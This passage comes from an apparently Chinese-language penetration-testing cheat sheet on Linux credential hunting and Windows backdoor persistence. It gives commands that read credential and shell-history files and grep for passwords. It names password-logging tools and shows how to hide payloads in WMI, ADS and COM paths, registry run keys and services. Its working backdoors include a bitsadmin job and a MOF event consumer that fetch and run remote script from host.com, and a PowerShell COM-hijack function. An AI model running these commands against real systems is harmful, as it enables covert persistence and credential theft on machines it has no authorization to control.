find / -perm -u=s -type f 2&gt;/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
</code></pre><h3 id="&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;"><a name="&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E;</h3>
<pre class="language-"><code>cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
</code></pre><h3 id="&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;"><a name="&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;" class="anchor-navigation-ex-anchor" href="#&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;/&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E;</h3>
<pre class="language-"><code>cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
</code></pre><h3 id="&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;"><a name="&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;" class="anchor-navigation-ex-anchor" href="#&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x627E;&#x5B58;&#x50A8;&#x7684;&#x660E;&#x6587;&#x7528;&#x6237;&#x540D;&#xFF0C;&#x5BC6;&#x7801;</h3>
<pre class="language-"><code>grep -i user [filename]
grep -i pass [filename]
grep -C 5 &quot;password&quot; [filename]
find . -name &quot;*.php&quot; -print0 | xargs -0 grep -i -n &quot;var $password&quot; # Joomla
</code></pre><h1 id="&#x6743;&#x9650;&#x7EF4;&#x6301;"><a name="&#x6743;&#x9650;&#x7EF4;&#x6301;" class="anchor-navigation-ex-anchor" href="#&#x6743;&#x9650;&#x7EF4;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6743;&#x9650;&#x7EF4;&#x6301;</h1>
<h2 id="&#x7CFB;&#x7EDF;&#x540E;&#x95E8;"><a name="&#x7CFB;&#x7EDF;&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#&#x7CFB;&#x7EDF;&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7CFB;&#x7EDF;&#x540E;&#x95E8;</h2>
<h3 id="windows_2"><a name="windows_2" class="anchor-navigation-ex-anchor" href="#windows_2"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h3>
<h4 id="1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;"><a name="1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;&#x5BC6;&#x7801;&#x8BB0;&#x5F55;&#x5DE5;&#x5177;</h4>
<p>WinlogonHack 
WinlogonHack &#x662F;&#x4E00;&#x6B3E;&#x7528;&#x6765;&#x52AB;&#x53D6;&#x8FDC;&#x7A0B;3389&#x767B;&#x5F55;&#x5BC6;&#x7801;&#x7684;&#x5DE5;&#x5177;&#xFF0C;&#x5728; WinlogonHack &#x4E4B;&#x524D;&#x6709; &#x4E00;&#x4E2A; Gina &#x6728;&#x9A6C;&#x4E3B;&#x8981;&#x7528;&#x6765;&#x622A;&#x53D6; Windows 2000&#x4E0B;&#x7684;&#x5BC6;&#x7801;&#xFF0C;WinlogonHack &#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x622A; &#x53D6; Windows XP &#x4EE5;&#x53CA; Windows 2003 Server&#x3002;
&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x5668; 
&#x5B89;&#x88C5;&#x952E;&#x76D8;&#x8BB0;&#x5F55;&#x7684;&#x76EE;&#x5730;&#x4E0D;&#x5149;&#x662F;&#x8BB0;&#x5F55;&#x672C;&#x673A;&#x5BC6;&#x7801;&#xFF0C;&#x662F;&#x8BB0;&#x5F55;&#x7BA1;&#x7406;&#x5458;&#x4E00;&#x5207;&#x7684;&#x5BC6;&#x7801;&#xFF0C;&#x6BD4;&#x5982;&#x8BF4;&#x4FE1;&#x7BB1;&#xFF0C;WEB &#x7F51;&#x9875;&#x5BC6;&#x7801;&#x7B49;&#x7B49;&#xFF0C;&#x8FD9;&#x6837;&#x4E5F;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x5F88;&#x591A;&#x4FE1;&#x606F;&#x3002;
NTPass 
&#x83B7;&#x53D6;&#x7BA1;&#x7406;&#x5458;&#x53E3;&#x4EE4;,&#x4E00;&#x822C;&#x7528; gina &#x65B9;&#x5F0F;&#x6765;,&#x4F46;&#x6709;&#x4E9B;&#x673A;&#x5668;&#x4E0A;&#x5B89;&#x88C5;&#x4E86; pcanywhere &#x7B49;&#x8F6F;&#x4EF6;&#xFF0C;&#x4F1A;&#x5BFC;&#x81F4;&#x8FDC;&#x7A0B;&#x767B;&#x5F55;&#x7684;&#x65F6;&#x5019;&#x51FA;&#x73B0;&#x6545;&#x969C;&#xFF0C;&#x672C;&#x8F6F;&#x4EF6;&#x53EF;&#x5B9E;&#x73B0;&#x65E0;&#x969C;&#x788D;&#x622A;&#x53D6;&#x53E3;&#x4EE4;&#x3002;
Linux &#x4E0B; openssh &#x540E;&#x95E8; 
&#x91CD;&#x65B0;&#x7F16;&#x8BD1;&#x8FD0;&#x884C;&#x7684;sshd&#x670D;&#x52A1;&#xFF0C;&#x7528;&#x4E8E;&#x8BB0;&#x5F55;&#x7528;&#x6237;&#x7684;&#x767B;&#x9646;&#x5BC6;&#x7801;&#x3002;</p>
<h4 id="2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;"><a name="2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;payload&#x4F4D;&#x7F6E;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x5E38;&#x7528;&#x7684;&#x5B58;&#x50A8;Payload&#x4F4D;&#x7F6E;</h4>
<p><strong>WMI</strong> :
&#x5B58;&#x50A8;&#xFF1A;</p>
<pre class="language-"><code>$StaticClass = New-Object Management.ManagementClass(&apos;root\cimv2&apos;, $null,$null)
$StaticClass.Name = &apos;Win32_Command&apos;
$StaticClass.Put()
$StaticClass.Properties.Add(&apos;Command&apos; , $Payload)
$StaticClass.Put()
</code></pre><p>&#x8BFB;&#x53D6;:</p>
<pre class="language-"><code>$Payload=([WmiClass] &apos;Win32_Command&apos;).Properties[&apos;Command&apos;].Value
</code></pre><p><strong>&#x5305;&#x542B;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x7684;PE&#x6587;&#x4EF6;</strong>
&#x5229;&#x7528;&#x6587;&#x4EF6;hash&#x7684;&#x7B97;&#x6CD5;&#x7F3A;&#x9677;&#xFF0C;&#x5411;PE&#x6587;&#x4EF6;&#x4E2D;&#x9690;&#x85CF;Payload&#xFF0C;&#x540C;&#x65F6;&#x4E0D;&#x5F71;&#x54CD;&#x8BE5;PE&#x6587;&#x4EF6;&#x7684;&#x6570;&#x5B57;&#x7B7E;&#x540D; 
<strong>&#x7279;&#x6B8A;ADS</strong> 
&#x2026;</p>
<pre class="language-"><code>type putty.exe &gt; ...:putty.exe
wmic process call create c:\test\ads\...:putty.exe
</code></pre><p>&#x7279;&#x6B8A;COM&#x6587;&#x4EF6;</p>
<pre class="language-"><code>type putty.exe &gt; \\.\C:\test\ads\COM1:putty.exe
wmic process call create \\.\C:\test\ads\COM1:putty.exe
</code></pre><p>&#x78C1;&#x76D8;&#x6839;&#x76EE;&#x5F55;</p>
<pre class="language-"><code>type putty.exe &gt;C:\:putty.exe 
wmic process call create C:\:putty.exe
</code></pre><h4 id="3&#x3001;runrunonce-keys"><a name="3&#x3001;runrunonce-keys" class="anchor-navigation-ex-anchor" href="#3&#x3001;runrunonce-keys"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;Run/RunOnce Keys</h4>
<p>&#x7528;&#x6237;&#x7EA7; </p>
<pre class="language-"><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
</code></pre><p>&#x7BA1;&#x7406;&#x5458; </p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
</code></pre><h4 id="4&#x3001;bootexecute-key"><a name="4&#x3001;bootexecute-key" class="anchor-navigation-ex-anchor" href="#4&#x3001;bootexecute-key"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;BootExecute Key</h4>
<p>&#x7531;&#x4E8E;smss.exe&#x5728;Windows&#x5B50;&#x7CFB;&#x7EDF;&#x52A0;&#x8F7D;&#x4E4B;&#x524D;&#x542F;&#x52A8;&#xFF0C;&#x56E0;&#x6B64;&#x4F1A;&#x8C03;&#x7528;&#x914D;&#x7F6E;&#x5B50;&#x7CFB;&#x7EDF;&#x6765;&#x52A0;&#x8F7D;&#x5F53;&#x524D;&#x7684;&#x914D;&#x7F6E;&#x5355;&#x5143;&#xFF0C;&#x5177;&#x4F53;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;&#x4E3A;&#xFF1A;</p>
<pre class="language-"><code>HKLM\SYSTEM\CurrentControlSet\Control\hivelist
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager
</code></pre><h4 id="5&#x3001;userinit-key"><a name="5&#x3001;userinit-key" class="anchor-navigation-ex-anchor" href="#5&#x3001;userinit-key"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;Userinit Key</h4>
<p>WinLogon&#x8FDB;&#x7A0B;&#x52A0;&#x8F7D;&#x7684;login scripts,&#x5177;&#x4F53;&#x952E;&#x503C;&#xFF1A;</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
</code></pre><h4 id="6&#x3001;startup-keys"><a name="6&#x3001;startup-keys" class="anchor-navigation-ex-anchor" href="#6&#x3001;startup-keys"><i class="fa fa-link" aria-hidden="true"></i></a>6&#x3001;Startup Keys</h4>
<pre class="language-"><code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
</code></pre><h4 id="7&#x3001;services"><a name="7&#x3001;services" class="anchor-navigation-ex-anchor" href="#7&#x3001;services"><i class="fa fa-link" aria-hidden="true"></i></a>7&#x3001;Services</h4>
<p>&#x521B;&#x5EFA;&#x670D;&#x52A1; </p>
<pre class="language-"><code>sc create [ServerName] binPath= BinaryPathName
</code></pre><h4 id="8&#x3001;browser-helper-objects"><a name="8&#x3001;browser-helper-objects" class="anchor-navigation-ex-anchor" href="#8&#x3001;browser-helper-objects"><i class="fa fa-link" aria-hidden="true"></i></a>8&#x3001;Browser Helper Objects</h4>
<p>&#x672C;&#x8D28;&#x4E0A;&#x662F;Internet Explorer&#x542F;&#x52A8;&#x65F6;&#x52A0;&#x8F7D;&#x7684;DLL&#x6A21;&#x5757;</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
</code></pre><h4 id="9&#x3001;appinitdlls"><a name="9&#x3001;appinitdlls" class="anchor-navigation-ex-anchor" href="#9&#x3001;appinitdlls"><i class="fa fa-link" aria-hidden="true"></i></a>9&#x3001;AppInit_DLLs</h4>
<p>&#x52A0;&#x8F7D;User32.dll&#x4F1A;&#x52A0;&#x8F7D;&#x7684;DLL</p>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
</code></pre><h4 id="10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;"><a name="10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;" class="anchor-navigation-ex-anchor" href="#10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;"><i class="fa fa-link" aria-hidden="true"></i></a>10&#x3001;&#x6587;&#x4EF6;&#x5173;&#x8054;</h4>
<pre class="language-"><code>HKEY_LOCAL_MACHINE\Software\Classes
HKEY_CLASSES_ROOT
</code></pre><h4 id="11&#x3001;bitsadmin"><a name="11&#x3001;bitsadmin" class="anchor-navigation-ex-anchor" href="#11&#x3001;bitsadmin"><i class="fa fa-link" aria-hidden="true"></i></a>11&#x3001;<a href="http://www.liuhaihua.cn/archives/357579.html" target="_blank">bitsadmin</a></h4>
<pre class="language-"><code>bitsadmin /create backdoor
bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe
bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe &quot;/u /s /i:https://host.com/calc.sct scrobj.dll&quot;
bitsadmin /Resume backdoor
</code></pre><h4 id="12&#x3001;mof-"><a name="12&#x3001;mof-" class="anchor-navigation-ex-anchor" href="#12&#x3001;mof-"><i class="fa fa-link" aria-hidden="true"></i></a>12&#x3001;<a href="https://evi1cg.me/archives/Powershell_MOF_Backdoor.html" target="_blank">mof </a></h4>
<pre class="language-"><code>pragma namespace(&quot;\\\\.\\root\\subscription&quot;) 
instance of __EventFilter as $EventFilter
{
EventNamespace = &quot;Root\\Cimv2&quot;;
Name = &quot;filtP1&quot;;
Query = &quot;Select * From __InstanceModificationEvent &quot;
&quot;Where TargetInstance Isa \&quot;Win32_LocalTime\&quot; &quot;
&quot;And TargetInstance.Second = 1&quot;;
QueryLanguage = &quot;WQL&quot;;
}; 
instance of ActiveScriptEventConsumer as $Consumer
{
Name = &quot;consP1&quot;;
ScriptingEngine = &quot;JScript&quot;;
ScriptText = &quot;GetObject(\&quot;script:https://host.com/test\&quot;)&quot;;
}; 
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
</code></pre><p>&#x7BA1;&#x7406;&#x5458;&#x6267;&#x884C;&#xFF1A;</p>
<pre class="language-"><code>mofcomp test.mof
</code></pre><h4 id="13&#x3001;wmi"><a name="13&#x3001;wmi" class="anchor-navigation-ex-anchor" href="#13&#x3001;wmi"><i class="fa fa-link" aria-hidden="true"></i></a>13&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/" target="_blank">wmi</a></h4>
<p>&#x6BCF;&#x9694;60&#x79D2;&#x6267;&#x884C;&#x4E00;&#x6B21;notepad.exe</p>
<pre class="language-"><code>wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __EventFilter CREATE Name=&quot;BotFilter82&quot;, EventNameSpace=&quot;root\cimv2&quot;,QueryLanguage=&quot;WQL&quot;, Query=&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &apos;Win32_PerfFormattedData_PerfOS_System&apos;&quot;
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH CommandLineEventConsumer CREATE Name=&quot;BotConsumer23&quot;, ExecutablePath=&quot;C:\Windows\System32\notepad.exe&quot;,CommandLineTemplate=&quot;C:\Windows\System32\notepad.exe&quot;
wmic /NAMESPACE:&quot;\\root\subscription&quot; PATH __FilterToConsumerBinding CREATE Filter=&quot;__EventFilter.Name=\&quot;BotFilter82\&quot;&quot;, Consumer=&quot;CommandLineEventConsumer.Name=\&quot;BotConsumer23\&quot;&quot;
</code></pre><h4 id="14&#x3001;userland-persistence-with-scheduled-tasks"><a name="14&#x3001;userland-persistence-with-scheduled-tasks" class="anchor-navigation-ex-anchor" href="#14&#x3001;userland-persistence-with-scheduled-tasks"><i class="fa fa-link" aria-hidden="true"></i></a>14&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/" target="_blank">Userland Persistence With Scheduled Tasks</a></h4>
<p>&#x52AB;&#x6301;&#x8BA1;&#x5212;&#x4EFB;&#x52A1;UserTask&#xFF0C;&#x5728;&#x7CFB;&#x7EDF;&#x542F;&#x52A8;&#x65F6;&#x52A0;&#x8F7D;dll</p>
<pre class="language-"><code>function Invoke-ScheduledTaskComHandlerUserTask
{
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = &apos;Medium&apos;)]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,

[Switch]
$Force
)
$ScheduledTaskCommandPath = &quot;HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32&quot;
if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name &apos;(default)&apos; -ErrorAction SilentlyContinue) -eq $null)){
New-Item $ScheduledTaskCommandPath -Force |
New-ItemProperty -Name &apos;(Default)&apos; -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Verbose &quot;Key already exists, consider using -Force&quot;
exit
}

if (Test-Path $ScheduledTaskCommandPath) {
Write-Verbose &quot;Created registry entries to hijack the UserTask&quot;
}else{
Write-Warning &quot;Failed to create registry key, exiting&quot;
exit
} 
}
Invoke-ScheduledTaskComHandlerUserTask -Command &quot;C:\test\testmsg.dll&quot; -Verbose
</code></pre><h4 id="15&#x3001;netsh"><a name="15&#x3001;netsh" class="anchor-navigation-ex-anchor" href="#15&#x3001;netsh"><i class="fa fa-link" aria-hidden="true"></i></a>15&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/" target="_blank">Netsh</a></h4>
<pre class="language-"><code>netsh add helper c:\test\netshtest.dll
</code></pre><p>&#x540E;&#x95E8;&#x89E6;&#x53D1;&#xFF1A;&#x6BCF;&#x6B21;&#x8C03;&#x7528;netsh</p>
<blockquote>
<p>dll&#x7F16;&#x5199;:<a href="https://github.com/outflanknl/NetshHelperBeacon" target="_blank">https://github.com/outflanknl/NetshHelperBeacon</a></p>
</blockquote>
<h4 id="16&#x3001;shim"><a name="16&#x3001;shim" class="anchor-navigation-ex-anchor" href="#16&#x3001;shim"><i class="fa fa-link" aria-hidden="true"></i></a>16&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/" target="_blank">Shim</a></h4>
<p>&#x5E38;&#x7528;&#x65B9;&#x5F0F;&#xFF1A;
InjectDll
RedirectShortcut
RedirectEXE</p>
<h4 id="17&#x3001;dll&#x52AB;&#x6301;"><a name="17&#x3001;dll&#x52AB;&#x6301;" class="anchor-navigation-ex-anchor" href="#17&#x3001;dll&#x52AB;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>17&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/" target="_blank">DLL&#x52AB;&#x6301;</a></h4>
<p>&#x901A;&#x8FC7;Rattler&#x81EA;&#x52A8;&#x679A;&#x4E3E;&#x8FDB;&#x7A0B;&#xFF0C;&#x68C0;&#x6D4B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x53EF;&#x7528;dll&#x52AB;&#x6301;&#x5229;&#x7528;&#x7684;&#x8FDB;&#x7A0B;
&#x4F7F;&#x7528;&#xFF1A;Procmon&#x534A;&#x81EA;&#x52A8;&#x6D4B;&#x8BD5;&#x66F4;&#x7CBE;&#x51C6;&#xFF0C;&#x5E38;&#x89C4;&#x751F;&#x6210;&#x7684;dll&#x4F1A;&#x5BFC;&#x81F4;&#x7A0B;&#x5E8F;&#x6267;&#x884C;&#x62A5;&#x9519;&#x6216;&#x4E2D;&#x65AD;&#xFF0C;&#x4F7F;&#x7528;AheadLib&#x914D;&#x5408;&#x751F;&#x6210;dll&#x52AB;&#x6301;&#x5229;&#x7528;&#x6E90;&#x7801;&#x4E0D;&#x4F1A;&#x5F71;&#x54CD;&#x7A0B;&#x5E8F;&#x6267;&#x884C;
&#x5DE5;&#x5177;&#xFF1A;<a href="https://github.com/sensepost/rattler" target="_blank">https://github.com/sensepost/rattler</a>
&#x5DE5;&#x5177;&#xFF1A;<a href="https://github.com/Yonsm/AheadLib" target="_blank">https://github.com/Yonsm/AheadLib</a></p>
<h4 id="18&#x3001;doubleagent-"><a name="18&#x3001;doubleagent-" class="anchor-navigation-ex-anchor" href="#18&#x3001;doubleagent-"><i class="fa fa-link" aria-hidden="true"></i></a>18&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D" target="_blank">DoubleAgent </a>/)</h4>
<p>&#x7F16;&#x5199;&#x81EA;&#x5B9A;&#x4E49;Verifier provider DLL
&#x901A;&#x8FC7;Application Verifier&#x8FDB;&#x884C;&#x5B89;&#x88C5;
&#x6CE8;&#x5165;&#x5230;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x6267;&#x884C;payload
&#x6BCF;&#x5F53;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x542F;&#x52A8;&#xFF0C;&#x5747;&#x4F1A;&#x6267;&#x884C;payload&#xFF0C;&#x76F8;&#x5F53;&#x4E8E;&#x4E00;&#x4E2A;&#x81EA;&#x542F;&#x52A8;&#x7684;&#x65B9;&#x5F0F;
POC : <a href="https://github.com/Cybellum/DoubleAgent" target="_blank">https://github.com/Cybellum/DoubleAgent</a></p>
<h4 id="19&#x3001;waitforexe-"><a name="19&#x3001;waitforexe-" class="anchor-navigation-ex-anchor" href="#19&#x3001;waitforexe-"><i class="fa fa-link" aria-hidden="true"></i></a>19&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/" target="_blank">waitfor.exe </a></h4>
<p>&#x4E0D;&#x652F;&#x6301;&#x81EA;&#x542F;&#x52A8;&#xFF0C;&#x4F46;&#x53EF;&#x8FDC;&#x7A0B;&#x4E3B;&#x52A8;&#x6FC0;&#x6D3B;&#xFF0C;&#x540E;&#x53F0;&#x8FDB;&#x7A0B;&#x663E;&#x793A;&#x4E3A;waitfor.exe
POC : <a href="https://github.com/3gstudent/Waitfor-Persistence" target="_blank">https://github.com/3gstudent/Waitfor-Persistence</a></p>
<h4 id="20&#x3001;appdomainmanager"><a name="20&#x3001;appdomainmanager" class="anchor-navigation-ex-anchor" href="#20&#x3001;appdomainmanager"><i class="fa fa-link" aria-hidden="true"></i></a>20&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/" target="_blank">AppDomainManager</a></h4>
<p>&#x9488;&#x5BF9;.Net&#x7A0B;&#x5E8F;&#xFF0C;&#x901A;&#x8FC7;&#x4FEE;&#x6539;AppDomainManager&#x80FD;&#x591F;&#x52AB;&#x6301;.Net&#x7A0B;&#x5E8F;&#x7684;&#x542F;&#x52A8;&#x8FC7;&#x7A0B;&#x3002;&#x5982;&#x679C;&#x52AB;&#x6301;&#x4E86;&#x7CFB;&#x7EDF;&#x5E38;&#x89C1;.Net&#x7A0B;&#x5E8F;&#x5982;powershell.exe&#x7684;&#x542F;&#x52A8;&#x8FC7;&#x7A0B;&#xFF0C;&#x5411;&#x5176;&#x6DFB;&#x52A0;payload&#xFF0C;&#x5C31;&#x80FD;&#x5B9E;&#x73B0;&#x4E00;&#x79CD;&#x88AB;&#x52A8;&#x7684;&#x540E;&#x95E8;&#x89E6;&#x53D1;&#x673A;&#x5236;</p>
<h4 id="21&#x3001;office"><a name="21&#x3001;office" class="anchor-navigation-ex-anchor" href="#21&#x3001;office"><i class="fa fa-link" aria-hidden="true"></i></a>21&#x3001;Office</h4>
<p><a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/" target="_blank">&#x52AB;&#x6301;Office&#x8F6F;&#x4EF6;&#x7684;&#x7279;&#x5B9A;&#x529F;&#x80FD;</a>:&#x901A;&#x8FC7;dll&#x52AB;&#x6301;,&#x5728;Office&#x8F6F;&#x4EF6;&#x6267;&#x884C;&#x7279;&#x5B9A;&#x529F;&#x80FD;&#x65F6;&#x89E6;&#x53D1;&#x540E;&#x95E8;
<a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8/" target="_blank">&#x5229;&#x7528;VSTO&#x5B9E;&#x73B0;&#x7684;office&#x540E;&#x95E8;</a>
<a href="https://github.com/3gstudent/Office-Persistence" target="_blank">Office&#x52A0;&#x8F7D;&#x9879;</a></p>
<ul>
<li>Word WLL </li>
<li>Excel XLL </li>
<li>Excel VBA add-ins </li>
<li>PowerPoint VBA add-ins</li>
</ul>
<blockquote>
<p>&#x53C2;&#x8003;1 &#xFF1A;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/" target="_blank">https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/</a>
&#x53C2;&#x8003;2 &#xFF1A;<a href="https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/" target="_blank">https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/</a></p>
</blockquote>
<h4 id="22&#x3001;clr"><a name="22&#x3001;clr" class="anchor-navigation-ex-anchor" href="#22&#x3001;clr"><i class="fa fa-link" aria-hidden="true"></i></a>22&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/" target="_blank">CLR</a></h4>
<p>&#x65E0;&#x9700;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;&#x7684;&#x540E;&#x95E8;&#xFF0C;&#x5E76;&#x80FD;&#x591F;&#x52AB;&#x6301;&#x6240;&#x6709;.Net&#x7A0B;&#x5E8F;
POC:<a href="https://github.com/3gstudent/CLR-Injection" target="_blank">https://github.com/3gstudent/CLR-Injection</a></p>
<h4 id="23&#x3001;msdtc"><a name="23&#x3001;msdtc" class="anchor-navigation-ex-anchor" href="#23&#x3001;msdtc"><i class="fa fa-link" aria-hidden="true"></i></a>23&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/" target="_blank">msdtc</a></h4>
<p>&#x5229;&#x7528;MSDTC&#x670D;&#x52A1;&#x52A0;&#x8F7D;dll&#xFF0C;&#x5B9E;&#x73B0;&#x81EA;&#x542F;&#x52A8;&#xFF0C;&#x5E76;&#x7ED5;&#x8FC7;Autoruns&#x5BF9;&#x542F;&#x52A8;&#x9879;&#x7684;&#x68C0;&#x6D4B;
&#x5229;&#x7528;&#xFF1A;&#x5411; %windir%\system32\&#x76EE;&#x5F55;&#x6DFB;&#x52A0;dll&#x5E76;&#x91CD;&#x547D;&#x540D;&#x4E3A;oci.dll</p>
